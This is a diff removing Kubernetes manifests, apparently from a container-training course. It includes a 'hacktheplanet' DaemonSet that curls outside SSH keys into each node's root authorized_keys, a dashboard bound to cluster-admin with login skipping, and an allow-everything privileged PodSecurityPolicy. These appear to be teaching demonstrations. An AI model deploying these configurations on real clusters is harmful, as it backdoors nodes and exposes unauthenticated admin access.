mountPath: /usr/share/filebeat/inputs.d
readOnly: true
- name: data
mountPath: /usr/share/filebeat/data
- name: varlibdockercontainers
mountPath: /var/lib/docker/containers
readOnly: true
volumes:
- name: config
configMap:
defaultMode: 0600
name: filebeat-config
- name: varlibdockercontainers
hostPath:
path: /var/lib/docker/containers
- name: inputs
configMap:
defaultMode: 0600
name: filebeat-inputs
# data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
- name: data
hostPath:
path: /var/lib/filebeat-data
type: DirectoryOrCreate
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: filebeat
subjects:
- kind: ServiceAccount
name: filebeat
namespace: kube-system
roleRef:
kind: ClusterRole
name: filebeat
apiGroup: rbac.authorization.k8s.io
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
name: filebeat
labels:
k8s-app: filebeat
rules:
- apiGroups: [""] # "" indicates the core API group
resources:
- namespaces
- pods
verbs:
- get
- watch
- list
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: filebeat
namespace: kube-system
labels:
k8s-app: filebeat
---

View File

@@ -1,14 +0,0 @@
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: kubernetes-dashboard
labels:
k8s-app: kubernetes-dashboard
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: cluster-admin
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kube-system

View File

@@ -1,34 +0,0 @@
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: hacktheplanet
spec:
selector:
matchLabels:
app: hacktheplanet
template:
metadata:
labels:
app: hacktheplanet
spec:
volumes:
- name: root
hostPath:
path: /root
tolerations:
- effect: NoSchedule
operator: Exists
initContainers:
- name: hacktheplanet
image: alpine
volumeMounts:
- name: root
mountPath: /root
command:
- sh
- -c
- "apk update && apk add curl && curl https://github.com/jpetazzo.keys > /root/.ssh/authorized_keys"
containers:
- name: web
image: nginx

View File

@@ -1,18 +0,0 @@
global
daemon
maxconn 256
defaults
mode tcp
timeout connect 5000ms
timeout client 50000ms
timeout server 50000ms
frontend the-frontend
bind *:80
default_backend the-backend
backend the-backend
server google.com-80 google.com:80 maxconn 32 check
server ibm.fr-80 ibm.fr:80 maxconn 32 check

View File

@@ -1,16 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: haproxy
spec:
volumes:
- name: config
configMap:
name: haproxy
containers:
- name: haproxy
image: haproxy:1
volumeMounts:
- name: config
mountPath: /usr/local/etc/haproxy/

View File

@@ -1,13 +0,0 @@
apiVersion: networking.k8s.io/v1beta1
kind: Ingress
metadata:
name: whatever
spec:
rules:
- host: whatever.A.B.C.D.nip.io
http:
paths:
- path: /
backend:
serviceName: whatever
servicePort: 1234

View File

@@ -1,360 +0,0 @@
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: v1
kind: Namespace
metadata:
name: kubernetes-dashboard
---
apiVersion: v1
kind: ServiceAccount
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
kind: Service
apiVersion: v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kubernetes-dashboard
spec:
ports:
- port: 443
targetPort: 8443
selector:
k8s-app: kubernetes-dashboard
---
apiVersion: v1
kind: Secret
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard-certs
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
kind: Secret
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard-csrf
namespace: kubernetes-dashboard
type: Opaque
data:
csrf: ""
---
apiVersion: v1
kind: Secret
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard-key-holder
namespace: kubernetes-dashboard
type: Opaque
---
kind: ConfigMap
apiVersion: v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard-settings
namespace: kubernetes-dashboard
---
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kubernetes-dashboard
rules:
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
- apiGroups: [""]
resources: ["secrets"]
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs", "kubernetes-dashboard-csrf"]
verbs: ["get", "update", "delete"]
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
resourceNames: ["kubernetes-dashboard-settings"]
verbs: ["get", "update"]
# Allow Dashboard to get metrics.
- apiGroups: [""]
resources: ["services"]
resourceNames: ["heapster", "dashboard-metrics-scraper"]
verbs: ["proxy"]
- apiGroups: [""]
resources: ["services/proxy"]
resourceNames: ["heapster", "http:heapster:", "https:heapster:", "dashboard-metrics-scraper", "http:dashboard-metrics-scraper"]
verbs: ["get"]
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
rules:
# Allow Metrics Scraper to get metrics from the Metrics server
- apiGroups: ["metrics.k8s.io"]
resources: ["pods", "nodes"]
verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kubernetes-dashboard
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: kubernetes-dashboard
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: kubernetes-dashboard
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: kubernetes-dashboard
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
kind: Deployment
apiVersion: apps/v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kubernetes-dashboard
spec:
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
k8s-app: kubernetes-dashboard
template:
metadata:
labels:
k8s-app: kubernetes-dashboard
spec:
containers:
- name: kubernetes-dashboard
image: kubernetesui/dashboard:v2.0.0-rc2
imagePullPolicy: Always
ports:
- containerPort: 8443
protocol: TCP
args:
- --auto-generate-certificates
- --namespace=kubernetes-dashboard
# Uncomment the following line to manually specify Kubernetes API server Host
# If not specified, Dashboard will attempt to auto discover the API server and connect
# to it. Uncomment only if the default does not work.
# - --apiserver-host=http://my-address:port
- --enable-skip-login
volumeMounts:
- name: kubernetes-dashboard-certs
mountPath: /certs
# Create on-disk volume to store exec logs
- mountPath: /tmp
name: tmp-volume
livenessProbe:
httpGet:
scheme: HTTPS
path: /
port: 8443
initialDelaySeconds: 30
timeoutSeconds: 30
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsUser: 1001
runAsGroup: 2001
volumes:
- name: kubernetes-dashboard-certs
secret:
secretName: kubernetes-dashboard-certs
- name: tmp-volume
emptyDir: {}
serviceAccountName: kubernetes-dashboard
nodeSelector:
"beta.kubernetes.io/os": linux
# Comment the following tolerations if Dashboard must not be deployed on master
tolerations:
- key: node-role.kubernetes.io/master
effect: NoSchedule
---
kind: Service
apiVersion: v1
metadata:
labels:
k8s-app: dashboard-metrics-scraper
name: dashboard-metrics-scraper
namespace: kubernetes-dashboard
spec:
ports:
- port: 8000
targetPort: 8000
selector:
k8s-app: dashboard-metrics-scraper
---
kind: Deployment
apiVersion: apps/v1
metadata:
labels:
k8s-app: dashboard-metrics-scraper
name: dashboard-metrics-scraper
namespace: kubernetes-dashboard
spec:
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
k8s-app: dashboard-metrics-scraper
template:
metadata:
labels:
k8s-app: dashboard-metrics-scraper
annotations:
seccomp.security.alpha.kubernetes.io/pod: 'runtime/default'
spec:
containers:
- name: dashboard-metrics-scraper
image: kubernetesui/metrics-scraper:v1.0.2
ports:
- containerPort: 8000
protocol: TCP
livenessProbe:
httpGet:
scheme: HTTP
path: /
port: 8000
initialDelaySeconds: 30
timeoutSeconds: 30
volumeMounts:
- mountPath: /tmp
name: tmp-volume
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsUser: 1001
runAsGroup: 2001
serviceAccountName: kubernetes-dashboard
nodeSelector:
"beta.kubernetes.io/os": linux
# Comment the following tolerations if Dashboard must not be deployed on master
tolerations:
- key: node-role.kubernetes.io/master
effect: NoSchedule
volumes:
- name: tmp-volume
emptyDir: {}
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: dashboard
name: dashboard
spec:
selector:
matchLabels:
app: dashboard
template:
metadata:
labels:
app: dashboard
spec:
containers:
- args:
- sh
- -c
- apk add --no-cache socat && socat TCP-LISTEN:80,fork,reuseaddr OPENSSL:kubernetes-dashboard.kubernetes-dashboard:443,verify=0
image: alpine
name: dashboard
---
apiVersion: v1
kind: Service
metadata:
labels:
app: dashboard
name: dashboard
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: dashboard
type: NodePort
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: insecure-dashboard
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: cluster-admin
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard

View File

@@ -1,10 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: hello
namespace: default
spec:
containers:
- name: hello
image: nginx

View File

@@ -1,29 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: kaniko-build
spec:
initContainers:
- name: git-clone
image: alpine
command: ["sh", "-c"]
args:
- |
apk add --no-cache git &&
git clone git://github.com/jpetazzo/container.training /workspace
volumeMounts:
- name: workspace
mountPath: /workspace
containers:
- name: build-image
image: gcr.io/kaniko-project/executor:latest
args:
- "--context=/workspace/dockercoins/rng"
- "--insecure"
- "--destination=registry:5000/rng-kaniko:latest"
volumeMounts:
- name: workspace
mountPath: /workspace
volumes:
- name: workspace

View File

@@ -1,162 +0,0 @@
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------- Dashboard Secret ------------------- #
apiVersion: v1
kind: Secret
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard-certs
namespace: kube-system
type: Opaque
---
# ------------------- Dashboard Service Account ------------------- #
apiVersion: v1
kind: ServiceAccount
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
---
# ------------------- Dashboard Role & Role Binding ------------------- #
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: kubernetes-dashboard-minimal
namespace: kube-system
rules:
# Allow Dashboard to create 'kubernetes-dashboard-key-holder' secret.
- apiGroups: [""]
resources: ["secrets"]
verbs: ["create"]
# Allow Dashboard to create 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
verbs: ["create"]
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
- apiGroups: [""]
resources: ["secrets"]
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs"]
verbs: ["get", "update", "delete"]
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
resourceNames: ["kubernetes-dashboard-settings"]
verbs: ["get", "update"]
# Allow Dashboard to get metrics from heapster.
- apiGroups: [""]
resources: ["services"]
resourceNames: ["heapster"]
verbs: ["proxy"]
- apiGroups: [""]
resources: ["services/proxy"]
resourceNames: ["heapster", "http:heapster:", "https:heapster:"]
verbs: ["get"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: kubernetes-dashboard-minimal
namespace: kube-system
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: kubernetes-dashboard-minimal
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kube-system
---
# ------------------- Dashboard Deployment ------------------- #
kind: Deployment
apiVersion: apps/v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
spec:
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
k8s-app: kubernetes-dashboard
template:
metadata:
labels:
k8s-app: kubernetes-dashboard
spec:
containers:
- name: kubernetes-dashboard
image: k8s.gcr.io/kubernetes-dashboard-amd64:v1.10.1
ports:
- containerPort: 8443
protocol: TCP
args:
- --auto-generate-certificates
# Uncomment the following line to manually specify Kubernetes API server Host
# If not specified, Dashboard will attempt to auto discover the API server and connect
# to it. Uncomment only if the default does not work.
# - --apiserver-host=http://my-address:port
volumeMounts:
- name: kubernetes-dashboard-certs
mountPath: /certs
# Create on-disk volume to store exec logs
- mountPath: /tmp
name: tmp-volume
livenessProbe:
httpGet:
scheme: HTTPS
path: /
port: 8443
initialDelaySeconds: 30
timeoutSeconds: 30
volumes:
- name: kubernetes-dashboard-certs
secret:
secretName: kubernetes-dashboard-certs
- name: tmp-volume
emptyDir: {}
serviceAccountName: kubernetes-dashboard
# Comment the following tolerations if Dashboard must not be deployed on master
tolerations:
- key: node-role.kubernetes.io/master
effect: NoSchedule
---
# ------------------- Dashboard Service ------------------- #
kind: Service
apiVersion: v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
spec:
ports:
- port: 443
targetPort: 8443
selector:
k8s-app: kubernetes-dashboard

View File

@@ -1,110 +0,0 @@
# This is a local copy of:
# https://github.com/rancher/local-path-provisioner/blob/master/deploy/local-path-storage.yaml
---
apiVersion: v1
kind: Namespace
metadata:
name: local-path-storage
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: local-path-provisioner-service-account
namespace: local-path-storage
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
name: local-path-provisioner-role
namespace: local-path-storage
rules:
- apiGroups: [""]
resources: ["nodes", "persistentvolumeclaims"]
verbs: ["get", "list", "watch"]
- apiGroups: [""]
resources: ["endpoints", "persistentvolumes", "pods"]
verbs: ["*"]
- apiGroups: [""]
resources: ["events"]
verbs: ["create", "patch"]
- apiGroups: ["storage.k8s.io"]
resources: ["storageclasses"]
verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: local-path-provisioner-bind
namespace: local-path-storage
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: local-path-provisioner-role
subjects:
- kind: ServiceAccount
name: local-path-provisioner-service-account
namespace: local-path-storage
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: local-path-provisioner
namespace: local-path-storage
spec:
replicas: 1
selector:
matchLabels:
app: local-path-provisioner
template:
metadata:
labels:
app: local-path-provisioner
spec:
serviceAccountName: local-path-provisioner-service-account
containers:
- name: local-path-provisioner
image: rancher/local-path-provisioner:v0.0.8
imagePullPolicy: Always
command:
- local-path-provisioner
- --debug
- start
- --config
- /etc/config/config.json
volumeMounts:
- name: config-volume
mountPath: /etc/config/
env:
- name: POD_NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
volumes:
- name: config-volume
configMap:
name: local-path-config
---
apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
name: local-path
provisioner: rancher.io/local-path
volumeBindingMode: WaitForFirstConsumer
reclaimPolicy: Delete
---
kind: ConfigMap
apiVersion: v1
metadata:
name: local-path-config
namespace: local-path-storage
data:
config.json: |-
{
"nodePathMap":[
{
"node":"DEFAULT_PATH_FOR_NON_LISTED_NODES",
"paths":["/opt/local-path-provisioner"]
}
]
}

View File

@@ -1,138 +0,0 @@
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: system:aggregated-metrics-reader
labels:
rbac.authorization.k8s.io/aggregate-to-view: "true"
rbac.authorization.k8s.io/aggregate-to-edit: "true"
rbac.authorization.k8s.io/aggregate-to-admin: "true"
rules:
- apiGroups: ["metrics.k8s.io"]
resources: ["pods"]
verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: metrics-server:system:auth-delegator
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: system:auth-delegator
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: RoleBinding
metadata:
name: metrics-server-auth-reader
namespace: kube-system
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: extension-apiserver-authentication-reader
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system
---
apiVersion: apiregistration.k8s.io/v1beta1
kind: APIService
metadata:
name: v1beta1.metrics.k8s.io
spec:
service:
name: metrics-server
namespace: kube-system
group: metrics.k8s.io
version: v1beta1
insecureSkipTLSVerify: true
groupPriorityMinimum: 100
versionPriority: 100
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: metrics-server
namespace: kube-system
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: metrics-server
namespace: kube-system
labels:
k8s-app: metrics-server
spec:
selector:
matchLabels:
k8s-app: metrics-server
template:
metadata:
name: metrics-server
labels:
k8s-app: metrics-server
spec:
serviceAccountName: metrics-server
volumes:
# mount in tmp so we can safely use from-scratch images and/or read-only containers
- name: tmp-dir
emptyDir: {}
containers:
- name: metrics-server
image: k8s.gcr.io/metrics-server-amd64:v0.3.3
imagePullPolicy: Always
volumeMounts:
- name: tmp-dir
mountPath: /tmp
args:
- --kubelet-preferred-address-types=InternalIP
- --kubelet-insecure-tls
- --metric-resolution=5s
---
apiVersion: v1
kind: Service
metadata:
name: metrics-server
namespace: kube-system
labels:
kubernetes.io/name: "Metrics-server"
spec:
selector:
k8s-app: metrics-server
ports:
- port: 443
protocol: TCP
targetPort: 443
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: system:metrics-server
rules:
- apiGroups:
- ""
resources:
- pods
- nodes
- nodes/stats
verbs:
- get
- list
- watch
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: system:metrics-server
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: system:metrics-server
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system

View File

@@ -1,14 +0,0 @@
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
name: allow-testcurl-for-testweb
spec:
podSelector:
matchLabels:
app: testweb
ingress:
- from:
- podSelector:
matchLabels:
run: testcurl

View File

@@ -1,10 +0,0 @@
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
name: deny-all-for-testweb
spec:
podSelector:
matchLabels:
app: testweb
ingress: []

View File

@@ -1,22 +0,0 @@
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
name: deny-from-other-namespaces
spec:
podSelector:
matchLabels:
ingress:
- from:
- podSelector: {}
---
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
name: allow-webui
spec:
podSelector:
matchLabels:
app: webui
ingress:
- from: []

View File

@@ -1,8 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: nginx-without-volume
spec:
containers:
- name: nginx
image: nginx

View File

@@ -1,13 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: nginx-with-volume
spec:
volumes:
- name: www
containers:
- name: nginx
image: nginx
volumeMounts:
- name: www
mountPath: /usr/share/nginx/html/

View File

@@ -1,21 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: nginx-with-git
spec:
volumes:
- name: www
containers:
- name: nginx
image: nginx
volumeMounts:
- name: www
mountPath: /usr/share/nginx/html/
- name: git
image: alpine
command: [ "sh", "-c", "apk add git && git clone https://github.com/octocat/Spoon-Knife /www" ]
volumeMounts:
- name: www
mountPath: /www/
restartPolicy: OnFailure

View File

@@ -1,20 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: nginx-with-init
spec:
volumes:
- name: www
containers:
- name: nginx
image: nginx
volumeMounts:
- name: www
mountPath: /usr/share/nginx/html/
initContainers:
- name: git
image: alpine
command: [ "sh", "-c", "apk add --no-cache git && git clone https://github.com/octocat/Spoon-Knife /www" ]
volumeMounts:
- name: www
mountPath: /www/

View File

@@ -1,98 +0,0 @@
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: persistentconsul
rules:
- apiGroups: [""]
resources:
- pods
verbs:
- get
- list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: persistentconsul
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: persistentconsul
subjects:
- kind: ServiceAccount
name: persistentconsul
namespace: default
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: persistentconsul
---
apiVersion: v1
kind: Service
metadata:
name: persistentconsul
spec:
ports:
- port: 8500
name: http
selector:
app: persistentconsul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: persistentconsul
spec:
serviceName: persistentconsul
replicas: 3
selector:
matchLabels:
app: persistentconsul
volumeClaimTemplates:
- metadata:
name: data
spec:
accessModes:
- ReadWriteOnce
resources:
requests:
storage: 1Gi
template:
metadata:
labels:
app: persistentconsul
spec:
serviceAccountName: persistentconsul
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchExpressions:
- key: app
operator: In
values:
- persistentconsul
topologyKey: kubernetes.io/hostname
terminationGracePeriodSeconds: 10
containers:
- name: consul
image: "consul:1.6"
volumeMounts:
- name: data
mountPath: /consul/data
args:
- "agent"
- "-bootstrap-expect=3"
- "-retry-join=provider=k8s label_selector=\"app=persistentconsul\""
- "-client=0.0.0.0"
- "-data-dir=/consul/data"
- "-server"
- "-ui"
lifecycle:
preStop:
exec:
command:
- /bin/sh
- -c
- consul leave

File diff suppressed because it is too large Load Diff

View File

@@ -1,37 +0,0 @@
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: postgres
spec:
selector:
matchLabels:
app: postgres
serviceName: postgres
template:
metadata:
labels:
app: postgres
spec:
#schedulerName: stork
initContainers:
- name: rmdir
image: alpine
volumeMounts:
- mountPath: /vol
name: postgres
command: ["sh", "-c", "if [ -d /vol/lost+found ]; then rmdir /vol/lost+found; fi"]
containers:
- name: postgres
image: postgres:11
volumeMounts:
- mountPath: /var/lib/postgresql/data
name: postgres
volumeClaimTemplates:
- metadata:
name: postgres
spec:
accessModes: ["ReadWriteOnce"]
resources:
requests:
storage: 1Gi

View File

@@ -1,39 +0,0 @@
---
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
name: privileged
annotations:
seccomp.security.alpha.kubernetes.io/allowedProfileNames: '*'
spec:
privileged: true
allowPrivilegeEscalation: true
allowedCapabilities:
- '*'
volumes:
- '*'
hostNetwork: true
hostPorts:
- min: 0
max: 65535
hostIPC: true
hostPID: true
runAsUser:
rule: 'RunAsAny'
seLinux:
rule: 'RunAsAny'
supplementalGroups:
rule: 'RunAsAny'
fsGroup:
rule: 'RunAsAny'
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: psp:privileged
rules:
- apiGroups: ['policy']
resources: ['podsecuritypolicies']
verbs: ['use']
resourceNames: ['privileged']

View File

@@ -1,38 +0,0 @@
---
apiVersion: extensions/v1beta1
kind: PodSecurityPolicy
metadata:
annotations:
apparmor.security.beta.kubernetes.io/allowedProfileNames: runtime/default
apparmor.security.beta.kubernetes.io/defaultProfileName: runtime/default
seccomp.security.alpha.kubernetes.io/allowedProfileNames: docker/default
seccomp.security.alpha.kubernetes.io/defaultProfileName: docker/default
name: restricted
spec:
allowPrivilegeEscalation: false
fsGroup:
rule: RunAsAny
runAsUser:
rule: RunAsAny
seLinux:
rule: RunAsAny
supplementalGroups:
rule: RunAsAny
volumes:
- configMap
- emptyDir
- projected
- secret
- downwardAPI
- persistentVolumeClaim
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: psp:restricted
rules:
- apiGroups: ['policy']
resources: ['podsecuritypolicies']
verbs: ['use']
resourceNames: ['restricted']

View File

@@ -1,15 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: registry
spec:
containers:
- name: registry
image: registry
env:
- name: REGISTRY_HTTP_ADDR
valueFrom:
configMapKeyRef:
name: registry
key: http.addr

View File

@@ -1,67 +0,0 @@
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
annotations:
deployment.kubernetes.io/revision: "2"
creationTimestamp: null
generation: 1
labels:
app: socat
name: socat
namespace: kube-system
selfLink: /apis/extensions/v1beta1/namespaces/kube-system/deployments/socat
spec:
replicas: 1
selector:
matchLabels:
app: socat
strategy:
rollingUpdate:
maxSurge: 1
maxUnavailable: 1
type: RollingUpdate
template:
metadata:
creationTimestamp: null
labels:
app: socat
spec:
containers:
- args:
- sh
- -c
- apk add --no-cache socat && socat TCP-LISTEN:80,fork,reuseaddr OPENSSL:kubernetes-dashboard:443,verify=0
image: alpine
imagePullPolicy: Always
name: socat
resources: {}
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
dnsPolicy: ClusterFirst
restartPolicy: Always
schedulerName: default-scheduler
securityContext: {}
terminationGracePeriodSeconds: 30
status: {}
---
apiVersion: v1
kind: Service
metadata:
creationTimestamp: null
labels:
app: socat
name: socat
namespace: kube-system
selfLink: /api/v1/namespaces/kube-system/services/socat
spec:
externalTrafficPolicy: Cluster
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: socat
sessionAffinity: None
type: NodePort
status:
loadBalancer: {}

View File

@@ -1,11 +0,0 @@
kind: StorageClass
apiVersion: storage.k8s.io/v1beta1
metadata:
name: portworx-replicated
annotations:
storageclass.kubernetes.io/is-default-class: "true"
provisioner: kubernetes.io/portworx-volume
parameters:
repl: "2"
priority_io: "high"

View File

@@ -1,103 +0,0 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: traefik-ingress-controller
namespace: kube-system
---
kind: DaemonSet
apiVersion: apps/v1
metadata:
name: traefik-ingress-controller
namespace: kube-system
labels:
k8s-app: traefik-ingress-lb
spec:
selector:
matchLabels:
k8s-app: traefik-ingress-lb
template:
metadata:
labels:
k8s-app: traefik-ingress-lb
name: traefik-ingress-lb
spec:
tolerations:
- effect: NoSchedule
operator: Exists
hostNetwork: true
serviceAccountName: traefik-ingress-controller
terminationGracePeriodSeconds: 60
containers:
- image: traefik:1.7
name: traefik-ingress-lb
ports:
- name: http
containerPort: 80
hostPort: 80
- name: admin
containerPort: 8080
hostPort: 8080
securityContext:
capabilities:
drop:
- ALL
add:
- NET_BIND_SERVICE
args:
- --api
- --kubernetes
- --logLevel=INFO
---
kind: Service
apiVersion: v1
metadata:
name: traefik-ingress-service
namespace: kube-system
spec:
selector:
k8s-app: traefik-ingress-lb
ports:
- protocol: TCP
port: 80
name: web
- protocol: TCP
port: 8080
name: admin
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
name: traefik-ingress-controller
rules:
- apiGroups:
- ""
resources:
- services
- endpoints
- secrets
verbs:
- get
- list
- watch
- apiGroups:
- extensions
resources:
- ingresses
verbs:
- get
- list
- watch
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
name: traefik-ingress-controller
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: traefik-ingress-controller
subjects:
- kind: ServiceAccount
name: traefik-ingress-controller
namespace: kube-system

View File

@@ -1,33 +0,0 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: jean.doe
namespace: users
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: users:jean.doe
rules:
- apiGroups: [ certificates.k8s.io ]
resources: [ certificatesigningrequests ]
verbs: [ create ]
- apiGroups: [ certificates.k8s.io ]
resourceNames: [ users:jean.doe ]
resources: [ certificatesigningrequests ]
verbs: [ get, create, delete, watch ]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: users:jean.doe
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: users:jean.doe
subjects:
- kind: ServiceAccount
name: jean.doe
namespace: users

View File

@@ -1,70 +0,0 @@
---
apiVersion: v1
kind: PersistentVolume
metadata:
name: consul-node2
annotations:
node: node2
spec:
capacity:
storage: 10Gi
accessModes:
- ReadWriteOnce
persistentVolumeReclaimPolicy: Delete
local:
path: /mnt/consul
nodeAffinity:
required:
nodeSelectorTerms:
- matchExpressions:
- key: kubernetes.io/hostname
operator: In
values:
- node2
---
apiVersion: v1
kind: PersistentVolume
metadata:
name: consul-node3
annotations:
node: node3
spec:
capacity:
storage: 10Gi
accessModes:
- ReadWriteOnce
persistentVolumeReclaimPolicy: Delete
local:
path: /mnt/consul
nodeAffinity:
